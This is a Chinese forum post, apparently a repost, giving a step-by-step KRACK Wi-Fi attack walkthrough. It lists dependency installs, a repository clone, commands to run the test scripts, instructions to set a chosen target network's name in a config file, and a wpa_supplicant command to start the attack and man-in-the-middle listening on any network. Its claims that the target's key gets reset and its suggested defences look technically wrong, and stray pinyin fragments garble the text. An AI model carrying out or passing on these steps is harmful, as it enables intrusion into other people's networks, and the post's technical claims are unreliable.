| 弹出连接提示弹窗后,输入任意密码位数均可,尝试连接,目标wifi会被攻击,创造握手,目标wifi密钥会被重置成你设定的密钥,在iPhone手机上可以看到有人不断连接和断开,这时候就是连接成功,可以开始监听,利用中间人技术,这里以iPhone手机手机做测验。Krack曝出来很久了,所以在11.3号写下这篇文章,思来想去就发表在freebuf这吧。 从事件开始到现在也一直没有攻击的套件和利用文章,按步骤操作,过程很简单,研究人员都可以看懂,不提倡恶意攻击者运用,所以就不写傻瓜tou式教程lan,在绝大用户都没更新的时候,还是希望这篇文章只是作为研究运用(漏洞没有那么大的伤害性) 打开终端: apt-get update apt-get install libnl-3-dev libnl-genl-3-dev pkg-config libssl-dev net-tools git sysfsutils python-scapy python-pycryptodome  Wifi重大漏洞下载文件: git clone https://github.com/NoahhhRyan/krackattacks-test cd krackattacks-test-research cd krackattacks chmod 777 krack-ft-test.py chmod 777 disable-hwcrypto.sh ./disable-hwcrypto.sh python krack-ft-test.py  Wifi重大漏洞 设置network.conf文件,在目录里需要将里面的”testnet”改成你要攻击的wifi名,密码随意,保存在套件目录下:  Wifi重大漏洞  Wifi重大漏洞 最后执行如下命令,并尝试连接目标开始攻击,等待结果。 sudo wpa_supplicant -D nl80211 -i wlan0 -c network.conf  Wifi重大漏洞  Wifi重大漏洞 然后也可以对任意wifi进行攻击,在wifi列表点击连接即可,在iPhone手机上的热点栏能看到攻击者不断连接和断开,这里我们再测验了一个wifi,效果同样可以。  Wifi重大漏洞防御方式 总结一下,提供一个暂时的搞定办法,更改路由器默认用户名,密码和SSID,打开防火墙,关闭SSID广播,为自己的用户设置单独的SSID,完全关闭DHCP。 危害性 其实不用那么担心,咱们大天朝wifiwan能yao匙都存在多少年了,比它牛逼多了,也没见你们害怕啊。 |
|Archiver|手机版|家电维修论坛
( 蜀ICP备19011473号-4 川公网安备51102502000164号 )
GMT+8, 2026-1-15 20:50 , Processed in 0.185358 second(s), 17 queries .
Powered by Discuz! X3.5
© 2001-2025 Discuz! Team.
